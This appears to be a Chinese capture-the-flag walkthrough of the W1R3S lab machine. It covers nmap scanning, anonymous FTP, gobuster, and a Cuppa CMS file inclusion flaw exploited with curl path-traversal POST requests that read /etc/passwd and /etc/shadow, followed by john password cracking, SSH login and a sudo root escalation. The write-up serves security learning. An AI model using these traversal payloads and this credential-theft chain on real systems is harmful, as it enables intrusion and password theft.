信息收集
主机探测
nmap -sn 192.168.88.0/24
获得目标靶机IP地址:192.168.88.130
端口扫描
发现21 FTP、22 SSH、80 HTTP、3306 mysql端口开放
详细信息扫描
nmap -sT -sV -O -sC -p 21,22,80,3306 192.168.88.130
默认脚本扫描
发现了wordpress
UDP扫描
没有发现可利用信息
FTP登录
尝试使用匿名用户登录到FTP服务器,发现有3个目录
获取所有文件并复制到本地
查看文件内容
第一个疑似MD5哈希值,第二个疑似base64编码
分别对其解密,并没有发现有效信息。
继续查看ftp下载的文件,看到一个员工名单,猜测可能是登录的用户或密码,一个倒置颠倒的字符串恢复以后没有有效信息,21端口暂时先放弃。
尝试访问wordpress,但是重定向到了localhost/wordpress
尝试修改host文件将localhost解析到靶机的IP地址192.168.88.130
再次进行访问仍然不行,放弃该路径。
目录扫描
猜测可能存在其它路径,使用gobuster扫一下目录,发现可疑路径/administrator
漏洞发现
对/administrator访问,跳转到了安装界面,同时得知网站使用了Cuppa CMS但是不知道版本号,确定了数据库是mysql
使用searchsploit查询,发现该内容管理系统存在文件包含漏洞,但是不知道这个版本是否存在该漏洞。
漏洞验证
将25971.txt复制下来查看,尝试验证漏洞存在
使用http://192.168.88.130/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
发现有反应但是并没有获取到passwd信息
尝试网上下载该内容分发软件进行代码审计,发现请求方式应该为POST
使用curl进行POST请求
curl -X POST -d "urlConfig=../../../../../../../../../etc/passwd
" http://192.168.88.130/administrator/alerts/alertConfigField.php
成功获取到了passwd文件内容,可登录用户为root,www-date,w1r3s
尝试查看shadow文件内容,获取到对应用户密码加密值。
curl -X POST -d "urlConfig=../../../../../../../../../etc/shadow
" http://192.168.88.130/administrator/alerts/alertConfigField.php
暴力破解
使用john破解,得到了w1r3s账户的密码computer,其它的目前没有破解出来。
SSH登录
用ssh登录到w1r3s用户
权限提升
查看权限,发现拥有sudo权限,并且sudo可执行所有操作
使用sudo su切换root账户,获取到flag
查看flag,完成主机渗透。
总结
总的来说该靶机比较适合入门,难度较为简单。开始主要是进行信息收集获取到21(FTP),22(SSH),80(HTTP),3306(MYSQL)端口以及相应版本信息,然后进行目录扫描发现到administrator这个路径,知道使用的是cuppa cms这个内容分发系统,使用searchsploit查询到漏洞并验证漏洞存在,最终通过获取到passwd和shadow破解密码进行ssh登录,因为w1r3s拥有sudo的所有权限,可以直接切换到root获取flag。
21端口收集到的信息可能也是www-data或者root的密码,或者是mysql的密码。